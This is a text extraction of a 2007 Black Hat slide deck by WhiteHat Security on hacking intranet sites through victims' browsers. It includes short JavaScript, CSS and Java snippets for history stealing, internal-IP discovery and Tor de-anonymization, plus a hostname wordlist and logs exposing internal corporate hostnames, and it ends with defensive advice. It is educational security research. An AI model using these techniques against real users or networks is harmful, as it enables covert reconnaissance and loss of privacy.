Hacking Intranet Websites from the Outside ... - WhiteHat Security

Hacking Intranet Websitesfrom the Outside (Take 2)"Fun With and Without JavaScript Malware"Black Hat 2007 (Las Vegas)08.01.2007Jeremiah Grossman (Founder and CTO)Guest Star:Robert “RSnake” Hansen(CEO of SecTheory)© 2007 WhiteHat Security, Inc.1

Jeremiah Grossmanfounder and CTO of WhiteHat SecurityR&D and industry evangelisminternational conference speakerCo-Author of XSS AttacksWeb Application Security Consortium Co-founderFormer Yahoo! information security officer© 2007 WhiteHat Security, Inc.2

Robert “RSnake” HansenCEO of SecTheoryFounded the web application security lab(ha.ckers.org and sla.ckers.org)Co-Author of XSS AttacksFormer eBay Sr. Global Product ManagerDark Reading contributorFrequent industry conference speaker© 2007 WhiteHat Security, Inc.3

Comments from last year...“RSnake and Jeremiah pretty much destroyedany security we thought we had left, includingthe I’ll just browse without JavaScript“I have to go home and change“Disturbing”the password of my DSL router!”mantra. Brian Krebs, Could Washington you really Post call that browsingseveral Blackhat attendeesanyway?”Kyran© 2007 WhiteHat Security, Inc.4

The big 3!Cross-Site Scripting (XSS) - forcing maliciouscontent to be served by a trusted website to anunsuspecting user.Cross-Site Request Forgery (CSRF) - forcing anunsuspecting user’s browser to send requeststhey didn’t intend. (wire transfer, blog post, etc.)JavaScript Malware - payload of an XSS or CSRFattack, typically written in JavaScript, andexecuted in a browser.Exploitingthe Same-Origin PolicyRead OKattacker.comattacker.comRead Errorbank.com© 2007 WhiteHat Security, Inc.5

Getting hacked by JavaScript Malwarewebsite owner embedded JavaScript malware.web page defaced with embedded JavaScriptmalware.JavaScript Malware injected into a publicarea of a website. (persistent XSS)clicked on a specially-crafted link causingthe website to echo JavaScript Malware.(non-persistent XSS)© 2007 WhiteHat Security, Inc.6

TimelineWhat’s Next?XSRFJesse Burns (iSec), writes a whitepaper, likes this acronym betterSession RidingThomas Schreiber discovers CSRF,writes a white paper, changes the name2004XSS disclosed everywheresla.ckers.org forum posts over1,000 vulnerable websites.Intranet HackingWhiteHat Security discovers JavaScriptcan be used for port scanning20062005 Samy WormWeb Worm infects 1 millonMySpace profiles using XSS/CSRFOWASP CSRFCSRF added as #5 on theOWASP Top Ten projectDOM-Based XSSAmit Klein discovers a new formof XSS where the server doesn’tsee the payloadPhishing w/ Super Bait2007MITRE CVE TrendsSays CSRF is underreported and predictsstats increaseWeb browser hacking takes offOver 70 new attack techniquesshow up in 2006WhiteHat Security shows how Phishingattacks using XSS are more effectiveClient-Side TrojansZope discovers Webversion of Confused Deputy1988 Confused DeputyOriginal CSRF theory© 2007 WhiteHat Security, Inc.20002001Cross Site Request ForgeryPeter Watkins discovers Client-SideTrojans, CSRF, pronounces it "sea surf"HTML InjectionCERT issues an advisory aboutmalicious content being uploaded7

DenialAngerBargainingDepressionAcceptance“I patch my browser, have a firewalland use NAT. What do I have to beworried about?”Browser doesn’t matter much© 2007 WhiteHat Security, Inc.8

History Stealing using JavaScript and CSSCycles through thousands of URLschecking the link color.document.body.appendChild(l);var c = document.defaultView.getComputedStyle(l,null).getPropertyValue("color");document.body.removeChild(l);// check for visitedif (c == "rgb(0, 0, 255)") { // visited} else { // not visited} // end visited checkCommon intranethostnames make goodtargets as well...http://ha.ckers.org/fierce/hosts.txt© 2007 WhiteHat Security, Inc.9

© 2007 WhiteHat Security, Inc.http://ha.ckers.org/fierce/hosts.txt001020311011121314151617181922033com456789ILMIaa.auth-nsa01a02a1a2abcaboutacacademicoaccesoaccessaccountingaccountsacidactivestatadadamadkitadminadministracionadministradoradministratoradministratorsadminsadsadserveradslaeafaffiliateaffiliatesafiliadosagagendaagentaiaixajaxakakamaialalabamaalaskaalbuquerquealertsalphaalterwindamamarilloamericasananaheimanalyzerannounceannouncementsantivirusaoapapacheapolloappapp01app1appleapplicationapplicationsappsappserveraqararchiearcsightargentinaarizonaarkansasarlingtonasas400asiaasterixatathenaatlantaatlasattauauctionaustinauthautoavawayudaazbb.auth-nsb01b02b1b2b2bb2cbabackbackendbackupbakerbakersfieldbalancebalancerbaltimorebankingbayareabbbbddbbsbdbdcbebeabetabfbgbhbibillingbizbiztalkbjblackblackberryblogblogsbluebmbnbncbobobbofboisebolsaborderbostonboulderboybrbravobrazilbritianbroadcastbrokerbronzebrownbsbsdbsd0bsd01bsd02bsd1bsd2btbugbuggalobugsbugzillabuildbulletinsburnburnerbuscadorbuybvbwbybzcc.auth-nscacachecafecalendarcaliforniacallcalvincanadacanalcanoncareerscatalogcccdcdburnercdncertcertificatescertifycertservcertsrvcfcgcgichchannelchannelscharliecharlottechatchatschatservercheckcheckpointchichicagocicimscincinnaticiscocitrixckclclassclassesclassifiedsclassroomclevelandclicktrackclientclientesclientsclubclubsclusterclusterscmcmailcmscncococoacodecoldfusioncolombuscoloradocolumbuscomcommercecommerceservercommunigatecommunitycompaqcomprasconconcentratorconfconferenceconferencingconfidentialconnectconnecticutconsolaconsoleconsultconsultantconsultantsconsultingconsumercontactcontentcontractscorecore0core01corpcorpmailcorporatecorreocorreowebcortafuegoscounterstrikecoursescrcricketcrmcrscscsocssctcucust1cust10cust100cust101cust102cust103cust104cust105cust106cust107cust108cust109cust11cust110cust111cust112cust113cust114cust115cust116cust117cust118cust119cust12cust120cust121cust122cvcvscxcyczddallasdatadatabasedatabase01database02database1database2databasesdatastoredatosdaviddbdb0db01db02db1db2dcdedealersdecdefdefaultdefiantdelawaredelldeltadelta1demodemonstrationdemosdenverdepotdesdesarrollodescargasdesigndocumentaciondocumentosdomaindomainsdominiodominodominowebdoomdownloaddownloadsdowntowndragondrupaldsldyndynamicdynipdzee-come-commercee0eagleeartheastecechoecomecommerceediedueducationedwardeeegehejemploelpasoemailemployeesempresaempresasenmailintranetHRexchangerouter 10

Intranet HackingAttacks can penetrate theintranet by controlling/hijacking a user’s browser andusing JavaScript Malware,which is on the inside of thenetwork.© 2007 WhiteHat Security, Inc.11

Compromise NAT'ed IP Address with JavaSend internal IP address where JavaScript can access itLars Kindermannhttp://reglos.de/myaddress/function natIP() {var w = window.location;var host = w.host;var port = w.port || 80;var Socket = (new java.net.Socket(host,port)).getLocalAddress().getHostAddress();return Socket;}Or guess! Since most everyone is on192.168.1/0 or 10.0.1/0 it’s not a big dealif Java is disabled.© 2007 WhiteHat Security, Inc.12

JavaScript can scan for Web ServersAttacker can force a user’s browser to sendHTTP requests to anywhere, including the tothe intranet....If a web server islistening, HTML willbe returned causingthe JS interpreter toerror.If there is an error, a web server exists© 2007 WhiteHat Security, Inc.13

Bypassing Tor/Privoxy© 2007 WhiteHat Security, Inc.14

In case you need to de-anonymize (1)Java sockets do not use the browser network APIs. (no proxy)var l = document.location;var h =l.host.toString();var h = 80;var addr = new java.net.InetAddress.getByName(h);var c = java.nio.channels.SocketChannel.open(new java.net.InetSocketAddress(h, p));var line = "GET / HTTP/1.1 \nHost: " + h + "\n\r\n";var s1 = new java.lang.String(line);c.write(java.nio.ByteBuffer.wrap(s1.getBytes()));//Allocate a buffer to read the data from the server.var buffer = java.nio.ByteBuffer.allocate(8000);c.read(buffer);alert(new java.lang.String(buffer.array()));1.1.1.1 - - [27/Jul/2007:09:29:52 -0700] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (Windows; UWindows NT 5.1; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5"2.2.2.2.2 - - [27/Jul/2007:09:29:53 -0700] "GET /log.cgi HTTP/1.1 "200 1879 "-" "-"© 2007 WhiteHat Security, Inc.15

In case you need to de-anonymize (2)Windows networking microsoft-ds andnetbios-ssn sniffing from inside imageshttp://ha.ckers.org/blog/20070421/noisy-decloaking-methods/© 2007 WhiteHat Security, Inc.16

DenialAngerBargainingDepressionAcceptance“What were the browser developersthinking!?!”© 2007 WhiteHat Security, Inc.17

What about these?Enumerating extensions, OSapplications, and usernamesCompromising password managerusernames and passwordsand that’s besides never ending supply ofbuffer overflow, cache poisoning, and URLspoofing “exploits”© 2007 WhiteHat Security, Inc.18

Rich Internet Applications (RIA)more fun to be had...Flash, Active-X, Silverlight, Java,quicktime, windows media player,Acrobat, and hundreds ofbrowser extensions© 2007 WhiteHat Security, Inc.19

DenialAngerBargainingDepressionAcceptance“I’ll use NoScript, SafeHistory,install a VPN, and maybe turn offJavaScript.”© 2007 WhiteHat Security, Inc.20

Login DetectionDifferent JavaScript error messages arereturned depending on the login/logoutstatus of the user. SafeHistory won’t help.© 2007 WhiteHat Security, Inc.21

History Stealing without JavaScriptCycle through the same URLs, NoScriptwon’t help.#links a:visited {color: #ff00ff;}#links a:visited#link1 {background: url('/capture.cgi?login.yahoo.com');}#links a:visited#link2 {background: url('/capture.cgi?mail.google.com');}#links a:visited#link3 {background: url('/capture.cgi?mail.yahoo.com');}http://login.yahoo.com/http://mail.google.com/http://mail.yahoo.com/© 2007 WhiteHat Security, Inc.22

Ping/Web Server Sweep using HTMLThe LINK tag will halt a rendering page untilthe host responds or times out. No JavaScriptrequired.By measuring the time of the IMG tagrequest, it’s possible to tell if there is aWeb server or host active.The only problem is this method is slow,but Ilia Alshanetsky improved it with aclever technique....© 2007 WhiteHat Security, Inc.23

Content-Type: multipart/x-mixed-replaceallows segments of HTML that each represent aunique page. When a browser gets a new segmentit throws out the old one and renders the new.

Who needs Web 2.0 hacking whenWeb 0.9 works just fine.Besides, who really disablesJavaScript anyway?OK, OK, outside of this room?Or, what happens when theJavaScript malware is beinghosted on a trusted website?(social network, webmail, webbank, etc.)© 2007 WhiteHat Security, Inc.25

Split VPN Tunnel HackingSurfing while connected to the corporatenetwork may be secure with content filtering.However, not in the case of split VPN tunnels.Attacker controlled web pages (i.e. badguy.com)can launch several well-known XSS exploits.Intranet targets can be collected throughpassive recon such as referer leaking oractively through Browser History Hacks.© 2007 WhiteHat Security, Inc.26

VPN Set-Up© 2007 WhiteHat Security, Inc.27

VPN Hacking© 2007 WhiteHat Security, Inc.28

Example Recon65.57.245.11 - - [01/Mar/2007:16:22:06 -0800] "GET /... HTTP/1.1" 200 6793 "http://reactor.corp.google.com/..." "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.2pre) Gecko/20070223Camino/1.1b"193.138.107.179 - - [28/Jun/2007:01:15:38 -0700] "GET /... HTTP/1.0" 304 - "http://corporate1.internal.standardlife.com/..." "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR2.0.50727; InfoPath.1)"68.254.179.254 - - [03/Jul/2007:13:21:40 -0700] "GET /... HTTP/1.1" 200 88698 "http://collab.corp.efunds.com/..." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"15.227.217.77 - - [18/Jun/2007:07:00:14 -0700] "GET /... HTTP/1.1" 200 13823 "http://wildcat.boi.hp.com/... ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322;Tablet PC 1.7; .NET CLR 2.0.50727)"130.76.32.15 - - [19/Jun/2007:14:12:31 -0700] "GET /... HTTP/1.1" 200 179 "http://bestis.web.boeing.com/...""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"216.239.124.38 - - [19/Jun/2007:16:32:29 -0700] "GET /... HTTP/1.1" 200 88699 "http://wiki.sparta.cnet.com/..." "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515Firefox/2.0.0.4"© 2007 WhiteHat Security, Inc.29

30Airpwn + XSS + CSRF=Arian’s Idea(circa 2004)http://www.anachronic.com/file_archive/advisories/01.10.2004.aeadvisory.txthttp://archives.neohapsis.com/archives/sf/www-mobile/2004-q4/0025.html© 2007 WhiteHat Security, Inc.30

DenialAngerBargainingDepressionAcceptance“I’m going back to using lynx.”© 2007 WhiteHat Security, Inc.31

Web security is an oxymoronFirewalls and NAT aren’t what they used to beThe browser is patched, so what?I’m not the target, but everyone else on mynetwork isBrowser security needs a serious rethinkBrowser add-ons help, but only by seriouslyhobbling the user experience so users won’tadopt them anywayRemote users and VPN connections are open toexploitation© 2007 WhiteHat Security, Inc.32

DenialAngerBargainingDepressionAcceptance“Sure the web is hostile, but I canprotect myself.”© 2007 WhiteHat Security, Inc.33

Web Browser SecuritySurf with two web browsers or VMware’dPatch, patch, patch, disable, disable, disableStack up your add-ons (NoScript,SafeHistory, Netcraft Toolbar, eBay Toolbar,etc.)Logout, clear cookies, clear historyStop using laptops like firewalls (relying onthe browser to separate domains for us isn’tworking)© 2007 WhiteHat Security, Inc.34

1 wish...Public web pages should notbe able to initiate requeststo private IPs (RFC).Content-restriction too when youget around to it.http://www.gerv.net/security/content-restrictions/© 2007 WhiteHat Security, Inc.35

Website SecurityAsset Tracking – Find your websites, assign a responsibleparty, and rate their importance to the business.Because you can’t secure what you don’t know you own.Measure Security – Perform rigorous and on-goingvulnerability assessments, preferably every week.Because you can’t secure what you can’t measure.Development Frameworks – Provide programmers withsoftware development tools enabling them to write coderapidly that also happens to be secure. Because, youcan’t mandate secure code, only help it.Defense-in-Depth – Throw up as many roadblocks toattackers as possible. This includes custom errormessages, Web application firewalls, security withobscurity, and so on. Because 8 in 10 websites arealready insecure, no need to make it any easier.© 2007 WhiteHat Security, Inc.36

One more thing...CUPS HackingOS X: http://localhost:631/Inspired By:Kurt GrutzmacherSeth Bromberger© 2007 WhiteHat Security, Inc.37

Book SigningRight after thetalk outside in thePavilion© 2007 WhiteHat Security, Inc.38

Thank youFor more information visit:http://www.whitehatsec.com/http://www.sectheory.com/Jeremiah Grossman (Founder and CTO)jeremiah@whitehatsec.comRobert “RSnake” Hansen (CEO)robert@sectheory.com© 2007 WhiteHat Security, Inc.39

© 2007 WhiteHat Security, Inc.ReferencesThe Cross-Site Request Forgery (CSRF/XSRF) FAQhttp://www.cgisecurity.com/articles/csrf-faq.shtmlThe Confused Deputy - Original Cross-Site Request Forgery Theoryhttp://www.cap-lore.com/CapTheory/ConfusedDeputy.htmlZope discovers a Web version of the Confused Deputy, calls it Client-Side Trojanshttp://www.zope.org/Members/jim/ZopeSecurity/ClientSideTrojanCERT® Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requestshttp://www.cert.org/advisories/CA-2000-02.htmlPeter Watkins discovers Client-Side Trojans, calls it (CSRF, pronounced "sea surf")http://www.tux.org/~peterw/csrf.txtThomas Schreiber discovers CSRF, doesn't like the name, calls it Session Ridinghttp://www.securenet.de/papers/Session_Riding.pdfJesse Burns discovers CSRF, doesn't like the acronym, changes it to XSRF.http://www.isecpartners.com/files/XSRF_Paper_0.pdfDOM Based Cross Site Scripting or XSS of the Third Kindhttp://www.webappsec.org/projects/articles/071105.shtmlPhishing with Superbait, XSS used to host fake sites on the real website.http://www.whitehatsec.com/presentations/phishing_superbait.pdfIntranet Hacking from the Outside and JavaScript Port Scanninghttp://jeremiahgrossman.blogspot.com/2006/09/video-hacking-intranet-websites-from.htmlWeb browser hacking technqiues take offhttp://jeremiahgrossman.blogspot.com/2006/12/top-10-web-hacks-of-2006.htmlMITRE - Vulnerability Type Distributions in CVEhttp://cve.mitre.org/docs/vuln-trends/index.htmlOWASP Top Ten 2007http://www.owasp.org/index.php/Top_10_2007-A540